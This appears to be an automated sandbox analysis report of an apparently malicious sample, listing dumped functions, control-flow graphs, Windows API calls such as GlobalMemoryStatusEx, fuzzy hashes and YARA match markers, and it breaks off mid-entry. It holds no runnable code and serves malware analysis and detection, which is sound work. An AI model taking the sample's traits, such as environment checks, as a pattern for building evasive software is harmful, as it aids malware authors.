                                                                                                                            control_flow_graph 375 41a3659d-41a3662f GetCurrentProcess 380 41a36631-41a36637 375->380 381 41a36638-41a3666c GetCurrentThread 375->381 380->381 382 41a36675-41a366a9 GetCurrentProcess 381->382 383 41a3666e-41a36674 381->383 384 41a366b2-41a366cd call 41a36779 382->384 385 41a366ab-41a366b1 382->385 383->382 389 41a366d3-41a36702 GetCurrentThreadId 384->389 385->384 390 41a36704-41a3670a 389->390 391 41a3670b-41a3676d 389->391 390->391
                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 41A3661E
                                                                                                                            • GetCurrentThread.KERNEL32 ref: 41A3665B
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 41A36698
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 41A366F1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1684596370.0000000041A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 41A30000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_41a30000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Current$ProcessThread
                                                                                                                            • String ID: pUA
                                                                                                                            • API String ID: 2063062207-1592006644
                                                                                                                            • Opcode ID: 1d266e6f2990683ab6ef58739dc337b1998ded65d90fb21d0c5c07aa3b4e435f
                                                                                                                            • Instruction ID: 9cf6140ed89eeaa29f753b089fe5379c77eb4f1ecd13effe95e49cdfa58bea2c
                                                                                                                            • Opcode Fuzzy Hash: 1d266e6f2990683ab6ef58739dc337b1998ded65d90fb21d0c5c07aa3b4e435f
                                                                                                                            • Instruction Fuzzy Hash: 395186B09007098FEB54CFAAC948BDEBBF5EB88310F208459E419A72A0DB746945CB65
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 41A365A0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128threadCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 398 41a365a0-41a3662f GetCurrentProcess 402 41a36631-41a36637 398->402 403 41a36638-41a3666c GetCurrentThread 398->403 402->403 404 41a36675-41a366a9 GetCurrentProcess 403->404 405 41a3666e-41a36674 403->405 406 41a366b2-41a366cd call 41a36779 404->406 407 41a366ab-41a366b1 404->407 405->404 411 41a366d3-41a36702 GetCurrentThreadId 406->411 407->406 412 41a36704-41a3670a 411->412 413 41a3670b-41a3676d 411->413 412->413
                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 41A3661E
                                                                                                                            • GetCurrentThread.KERNEL32 ref: 41A3665B
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 41A36698
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 41A366F1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1684596370.0000000041A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 41A30000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_41a30000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Current$ProcessThread
                                                                                                                            • String ID: pUA
                                                                                                                            • API String ID: 2063062207-1592006644
                                                                                                                            • Opcode ID: 37d540be4ee2c164fed16c1f0ac67a3c2acbb839977b787b9d239dee94f763e7
                                                                                                                            • Instruction ID: 0c01bc5a9c500e329c63785b54d00eb109c91e7c9a2a03cc8f9b650eec2bf5fe
                                                                                                                            • Opcode Fuzzy Hash: 37d540be4ee2c164fed16c1f0ac67a3c2acbb839977b787b9d239dee94f763e7
                                                                                                                            • Instruction Fuzzy Hash: FC5166B09007098FEB54CFAAD548BDEBBF1EB88310F248459E419A72A0DB346945CB65
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004018F0 Relevance: 6.3, APIs: 5, Instructions: 77stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                                                            • GetLastError.KERNEL32 ref: 00401940
                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000017.00000001.1494452738.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000017.00000001.1494452738.000000000044B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_1_400000_bwsiuvcU.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3322701435-0
                                                                                                                            • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                            • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                                                            • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                            • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040AF66 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 0040AF80
                                                                                                                              • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                              • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                              • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                            • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                                              • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                                                            • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000017.00000001.1494452738.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000017.00000001.1494452738.000000000044B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_1_400000_bwsiuvcU.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1411284514-0
                                                                                                                            • Opcode ID: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                            • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                                                            • Opcode Fuzzy Hash: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                            • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 411B4F90 Relevance: 3.8, Strings: 3, Instructions: 95COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1051 411b4f90-411b4fb4 1053 411b4fb6-411b4fb9 1051->1053 1054 411b4fbb-411b4ff0 1053->1054 1055 411b4ff5-411b4ff8 1053->1055 1054->1055 1056 411b4ffa 1055->1056 1057 411b5008-411b500b 1055->1057 1081 411b4ffa call 411b607b 1056->1081 1082 411b4ffa call 411b5968 1056->1082 1058 411b503e-411b5041 1057->1058 1059 411b500d-411b5021 1057->1059 1060 411b5043-411b504a 1058->1060 1061 411b5055-411b5057 1058->1061 1069 411b5023-411b5025 1059->1069 1070 411b5027 1059->1070 1063 411b5119-411b511f 1060->1063 1064 411b5050 1060->1064 1065 411b5059 1061->1065 1066 411b505e-411b5061 1061->1066 1062 411b5000-411b5003 1062->1057 1064->1061 1065->1066 1066->1053 1068 411b5067-411b5076 1066->1068 1074 411b5078-411b509e 1068->1074 1075 411b50a0-411b50b6 1068->1075 1071 411b502a-411b5039 1069->1071 1070->1071 1071->1058 1074->1075 1075->1063 1081->1062 1082->1062
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1683187453.00000000411B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 411B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_411b0000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ,@@A$,@@A$LRq
                                                                                                                            • API String ID: 0-2996645422
                                                                                                                            • Opcode ID: 68157d8cf09833af7ca0f6c0faeb1fb162b662ddb220e9179c188e9dab766916
                                                                                                                            • Instruction ID: 4a7416bc43c76c9b28e42677bd0641ed2f5df94aa239105c46cc613c17732384
                                                                                                                            • Opcode Fuzzy Hash: 68157d8cf09833af7ca0f6c0faeb1fb162b662ddb220e9179c188e9dab766916
                                                                                                                            • Instruction Fuzzy Hash: D6318F70E11209DBEB55DFA9C48478EBBB1FF89340F118529E816FB250EBB19D428B85
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 411B4FA0 Relevance: 3.8, Strings: 3, Instructions: 95COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1083 411b4fa0-411b4fb4 1084 411b4fb6-411b4fb9 1083->1084 1085 411b4fbb-411b4ff0 1084->1085 1086 411b4ff5-411b4ff8 1084->1086 1085->1086 1087 411b4ffa 1086->1087 1088 411b5008-411b500b 1086->1088 1112 411b4ffa call 411b607b 1087->1112 1113 411b4ffa call 411b5968 1087->1113 1089 411b503e-411b5041 1088->1089 1090 411b500d-411b5021 1088->1090 1091 411b5043-411b504a 1089->1091 1092 411b5055-411b5057 1089->1092 1100 411b5023-411b5025 1090->1100 1101 411b5027 1090->1101 1094 411b5119-411b511f 1091->1094 1095 411b5050 1091->1095 1096 411b5059 1092->1096 1097 411b505e-411b5061 1092->1097 1093 411b5000-411b5003 1093->1088 1095->1092 1096->1097 1097->1084 1099 411b5067-411b5076 1097->1099 1105 411b5078-411b509e 1099->1105 1106 411b50a0-411b50b6 1099->1106 1102 411b502a-411b5039 1100->1102 1101->1102 1102->1089 1105->1106 1106->1094 1112->1093 1113->1093
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1683187453.00000000411B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 411B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_411b0000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ,@@A$,@@A$LRq
                                                                                                                            • API String ID: 0-2996645422
                                                                                                                            • Opcode ID: 53cb6d577a136b444cdb76c4103a1682c57f79eb7197c2edd2c68ff285c21249
                                                                                                                            • Instruction ID: 468b85f33c4984eaed66dff1d3266cafe24a4527428d2a6f482f5038347fff02
                                                                                                                            • Opcode Fuzzy Hash: 53cb6d577a136b444cdb76c4103a1682c57f79eb7197c2edd2c68ff285c21249
                                                                                                                            • Instruction Fuzzy Hash: 45319030E11209DBDB45CFA9C48078EB7B1FF89300F118529E806FB240EB719D41CB85
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 411B607B Relevance: 3.8, Strings: 3, Instructions: 66COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1114 411b607b-411b6080 1115 411b6083-411b60a0 1114->1115 1116 411b6026-411b602e 1114->1116 1122 411b60aa-411b611a 1115->1122 1117 411b6038-411b604e 1116->1117 1123 411b6053-411b6055 1117->1123 1124 411b605c-411b605f 1123->1124 1125 411b6057 1123->1125 1126 411b5981-411b5984 1124->1126 1127 411b6065-411b6072 1124->1127 1125->1124 1129 411b59ab-411b59ae 1126->1129 1130 411b5986-411b59a6 1126->1130 1132 411b59b0-411b59d0 1129->1132 1133 411b59d5-411b59d8 1129->1133 1130->1129 1132->1133 1135 411b59da-411b59fa 1133->1135 1136 411b59ff-411b5a02 1133->1136 1135->1136 1139 411b5a29-411b5a2c 1136->1139 1140 411b5a04-411b5a24 1136->1140 1142 411b5a2e-411b5a4e 1139->1142 1143 411b5a53-411b5a56 1139->1143 1140->1139 1142->1143 1147 411b5a58-411b5a78 1143->1147 1148 411b5a7d-411b5a80 1143->1148 1147->1148 1151 411b5a82-411b5aa2 1148->1151 1152 411b5aa7-411b5aaa 1148->1152 1151->1152 1158 411b5aac-411b5acc 1152->1158 1159 411b5ad1-411b5ad4 1152->1159 1158->1159 1162 411b5afb-411b5afe 1159->1162 1163 411b5ad6-411b5af6 1159->1163 1169 411b5b00-411b5b20 1162->1169 1170 411b5b25-411b5b28 1162->1170 1163->1162 1169->1170 1173 411b5b2a-411b5b4a 1170->1173 1174 411b5b4f-411b5b52 1170->1174 1173->1174 1180 411b5b79-411b5b7c 1174->1180 1181 411b5b54-411b5b74 1174->1181 1184 411b5b7e-411b5b9e 1180->1184 1185 411b5ba3-411b5ba6 1180->1185 1181->1180 1184->1185 1191 411b5ba8-411b5bc8 1185->1191 1192 411b5bcd-411b5bd0 1185->1192 1191->1192 1195 411b5bd2-411b5bf2 1192->1195 1196 411b5bf7-411b5bfa 1192->1196 1195->1196 1202 411b5bfc-411b5c1c 1196->1202 1203 411b5c21-411b5c24 1196->1203 1202->1203 1207 411b5c4b-411b5c4e 1203->1207 1208 411b5c26-411b5c46 1203->1208 1213 411b5c50-411b5c70 1207->1213 1214 411b5c75-411b5c78 1207->1214 1208->1207 1213->1214 1217 411b5c7a-411b5c9a 1214->1217 1218 411b5c9f-411b5ca2 1214->1218 1217->1218 1223 411b5cc9-411b5ccc 1218->1223 1224 411b5ca4-411b5cc4 1218->1224 1227 411b5cce-411b5cee 1223->1227 1228 411b5cf3-411b5cf6 1223->1228 1224->1223 1227->1228 1233 411b5cf8-411b5d18 1228->1233 1234 411b5d1d-411b5d20 1228->1234 1233->1234 1237 411b5d22-411b5d42 1234->1237 1238 411b5d47-411b5d4a 1234->1238 1237->1238 1243 411b5d4c-411b5d6c 1238->1243 1244 411b5d71-411b5d74 1238->1244 1243->1244 1247 411b5d9b-411b5d9e 1244->1247 1248 411b5d76-411b5d96 1244->1248 1253 411b5da0-411b5dc0 1247->1253 1254 411b5dc5-411b5dc8 1247->1254 1248->1247 1253->1254 1257 411b5dca-411b5dd6 1254->1257 1258 411b5def-411b5df2 1254->1258 1280 411b5dde-411b5dea 1257->1280 1263 411b5e19-411b5e1c 1258->1263 1264 411b5df4-411b5e14 1258->1264 1267 411b5e1e-411b5e2a 1263->1267 1268 411b5e37-411b5e3a 1263->1268 1264->1263 1288 411b5e32 1267->1288 1273 411b5e3c-411b5e5c 1268->1273 1274 411b5e61-411b5e64 1268->1274 1273->1274 1277 411b5e8b-411b5e8e 1274->1277 1278 411b5e66-411b5e86 1274->1278 1283 411b5e9b-411b5e9e 1277->1283 1284 411b5e90 1277->1284 1278->1277 1280->1258 1290 411b5ea0-411b5ec0 1283->1290 1291 411b5ec5-411b5ec8 1283->1291 1295 411b5e96 1284->1295 1288->1268 1290->1291 1293 411b5eca-411b5eea 1291->1293 1294 411b5eef-411b5ef2 1291->1294 1293->1294 1298 411b5f19-411b5f1c 1294->1298 1299 411b5ef4-411b5f14 1294->1299 1295->1283 1301 411b5f1e-411b5f3e 1298->1301 1302 411b5f43-411b5f46 1298->1302 1299->1298 1301->1302 1307 411b5f48-411b5f68 1302->1307 1308 411b5f6d-411b5f70 1302->1308 1307->1308 1310 411b5f72-411b5f74 1308->1310 1311 411b5f81-411b5f84 1308->1311 1345 411b5f76 call 411b8f1e 1310->1345 1346 411b5f76 call 411b8e70 1310->1346 1347 411b5f76 call 411b8e60 1310->1347 1316 411b5fab-411b5fae 1311->1316 1317 411b5f86-411b5fa6 1311->1317 1319 411b5fb0-411b5fd0 1316->1319 1320 411b5fd5-411b5fd8 1316->1320 1317->1316 1319->1320 1326 411b5fda-411b5ffa 1320->1326 1327 411b5fff-411b6002 1320->1327 1321 411b5f7c 1321->1311 1326->1327 1329 411b6029-411b602c 1327->1329 1330 411b6004-411b6024 1327->1330 1329->1123 1334 411b602e 1329->1334 1330->1329 1334->1117 1345->1321 1346->1321 1347->1321
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1683187453.00000000411B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 411B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_411b0000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Lf@A$Lf@A$N@AU
                                                                                                                            • API String ID: 0-380423495
                                                                                                                            • Opcode ID: fa5d26fa4738606e99e5b7e6f616329148eff1655ab600558d794f474ee51c02
                                                                                                                            • Instruction ID: df35f07523dfbce3d687515bb443064c239fd95b09cd9baa8e0e1e4ae1aef927
                                                                                                                            • Opcode Fuzzy Hash: fa5d26fa4738606e99e5b7e6f616329148eff1655ab600558d794f474ee51c02
                                                                                                                            • Instruction Fuzzy Hash: AB21E430A10304DFDB45EBB5E99129D7F72AF81304F1045F9C406DB286EE319E0AC782
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 4145F86A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 142COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1348 4145f86a-4145f883 1349 4145f885-4145f8ac call 4145e0a4 1348->1349 1350 4145f8ad-4145f8cc call 4145f0c4 1348->1350 1356 4145f8d2-4145f931 1350->1356 1357 4145f8ce-4145f8d1 1350->1357 1364 4145f937-4145f9c4 GlobalMemoryStatusEx 1356->1364 1365 4145f933-4145f936 1356->1365 1368 4145f9c6-4145f9cc 1364->1368 1369 4145f9cd-4145f9f5 1364->1369 1368->1369
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1683993706.0000000041450000.00000040.00000800.00020000.00000000.sdmp, Offset: 41450000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_41450000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: d@A
                                                                                                                            • API String ID: 0-4044796269
                                                                                                                            • Opcode ID: 53760b8f2ce90c3a5c8ff2782b4ca90afd44e21f1ab0402bd5920cba9a9b9b87
                                                                                                                            • Instruction ID: 7d58051a400b615f462c83899fcc24133e40632dbd36fb21335190bc410a79a5
                                                                                                                            • Opcode Fuzzy Hash: 53760b8f2ce90c3a5c8ff2782b4ca90afd44e21f1ab0402bd5920cba9a9b9b87
                                                                                                                            • Instruction Fuzzy Hash: EF413572D083868FDB04CB75C80069EBFF1EF8A210F1585ABD595E7291DB749846CBE1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 41D64250 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,41D6534A,00000000,00000000,3EDE4100,3DE0C974), ref: 41D65B98
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1684983317.0000000041D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 41D60000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_41d60000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessagePeek
                                                                                                                            • String ID: |$@A
                                                                                                                            • API String ID: 2222842502-3461025799
                                                                                                                            • Opcode ID: 2d0d465a6f4efe63faa89b944040ceddabf19a86015dbde703023c7d59a14bb6
                                                                                                                            • Instruction ID: 8488e6519f446ba8478575bd1c606657ae14a3f88f087a1e0eaf22d73a13d281
                                                                                                                            • Opcode Fuzzy Hash: 2d0d465a6f4efe63faa89b944040ceddabf19a86015dbde703023c7d59a14bb6
                                                                                                                            • Instruction Fuzzy Hash: 311114B5C002499FDB10CF9AD940BDEBBF8EB08320F10842AE958A3250C378A940CFA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 411BF18B Relevance: 2.6, Strings: 2, Instructions: 112COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1683187453.00000000411B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 411B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_411b0000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ls@A$ls@A
                                                                                                                            • API String ID: 0-472544680
                                                                                                                            • Opcode ID: 9e9a2baaaf36d7b222130a5475991787e9e4bc75892a378d820801bb3f3d635d
                                                                                                                            • Instruction ID: d69a9bd311622bc39c2f8bedaf130343efe30ed45479ae62767a1fb74c7d4b45
                                                                                                                            • Opcode Fuzzy Hash: 9e9a2baaaf36d7b222130a5475991787e9e4bc75892a378d820801bb3f3d635d
                                                                                                                            • Instruction Fuzzy Hash: 1D316F35F102169BCB09DFB5C85469EBBB6AF8A310F108569E806EB340EF70DD42CB95
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 411BF198 Relevance: 2.6, Strings: 2, Instructions: 104COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1683187453.00000000411B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 411B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_411b0000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ls@A$ls@A
                                                                                                                            • API String ID: 0-472544680
                                                                                                                            • Opcode ID: a2a12e3941d242d8df0ac387f781e9a0d984dbfe4a3997b259007e2b4d4632cd
                                                                                                                            • Instruction ID: d660e7f84fe2ba8f408f091e22e362925f3c4013e8f41b9c8a99635a45509c41
                                                                                                                            • Opcode Fuzzy Hash: a2a12e3941d242d8df0ac387f781e9a0d984dbfe4a3997b259007e2b4d4632cd
                                                                                                                            • Instruction Fuzzy Hash: 09314F34F0161A9BCB09DBA5C85469EBBB6AF8A310F108569E805EB344EF70DD42CB95
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 411B8F91 Relevance: 2.6, Strings: 2, Instructions: 95COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1683187453.00000000411B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 411B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_411b0000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ls@A$ls@A
                                                                                                                            • API String ID: 0-472544680
                                                                                                                            • Opcode ID: 670f5be02ab932e1b773d6d536d65ed639ea89f66624c9ba60a54ef1c7c3a01e
                                                                                                                            • Instruction ID: 89ef681cecb5dcb9fd5bce9809172c6bfaf7b20db27df5f0bed374550ac22ec3
                                                                                                                            • Opcode Fuzzy Hash: 670f5be02ab932e1b773d6d536d65ed639ea89f66624c9ba60a54ef1c7c3a01e
                                                                                                                            • Instruction Fuzzy Hash: 2B31B270E102199BDB09CF65C48039EBBBAFF89300F108529E802EB341EB71EC46CB55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 411B8FA0 Relevance: 2.6, Strings: 2, Instructions: 89COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1683187453.00000000411B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 411B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_411b0000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ls@A$ls@A
                                                                                                                            • API String ID: 0-472544680
                                                                                                                            • Opcode ID: b48d3f3ec734021e99d1cf16102ade7135fa58bc76874ccb72f3d8acaa1f5a9f
                                                                                                                            • Instruction ID: f7c8c013efc5070a4262cb3e00af04f545d7a18ba0227c41bb6e67c97b69f686
                                                                                                                            • Opcode Fuzzy Hash: b48d3f3ec734021e99d1cf16102ade7135fa58bc76874ccb72f3d8acaa1f5a9f
                                                                                                                            • Instruction Fuzzy Hash: EC319170E002199BDB09CF65D49079EBBB6BF89300F118529E806FB341EB719D468B55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 411B8E60 Relevance: 2.6, Strings: 2, Instructions: 78COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1683187453.00000000411B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 411B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_411b0000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: pr@A$pr@A
                                                                                                                            • API String ID: 0-2172208707
                                                                                                                            • Opcode ID: df5925f805e631bd295928d8518badd7e87c9a02098b0b2f9b1324f3a7bb30b9
                                                                                                                            • Instruction ID: 63d274fe7785f3f58fe852b8ea12fae039595f64063599b23cd53d70bf572101
                                                                                                                            • Opcode Fuzzy Hash: df5925f805e631bd295928d8518badd7e87c9a02098b0b2f9b1324f3a7bb30b9
                                                                                                                            • Instruction Fuzzy Hash: CF21B230E142159BDB09CF65C45069EBBB2BF89310F10852AE912FB380EB709846CB45
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 411B8E70 Relevance: 2.6, Strings: 2, Instructions: 73COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1683187453.00000000411B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 411B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_2_411b0000_bwsiuvcU.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: pr@A$pr@A
                                                                                                                            • API String ID: 0-2172208707
                                                                                                                            • Opcode ID: 3c32e93fe90a4d71ce0bb5345cd18c69fcc94bde485d4b9553bc7fb2d85938bc
                                                                                                                            • Instruction ID: 25dd690787cfb3db810d60d5a109109c5428761bc52d25e809f2f249f0dadf61
                                                                                                                            • Opcode Fuzzy Hash: 3c32e93fe90a4d71ce0bb5345cd18c69fcc94bde485d4b9553bc7fb2d85938bc
                                                                                                                            • Instruction Fuzzy Hash: 39219230E112199BCB09CFA5C45069EBBB2BF89710F11862AE912FB380EF719D45CB55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 411B6088 Relevance: 2.5, Strings: 2, Instructions: 37COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000002.1683187453.00000000411B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 411B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
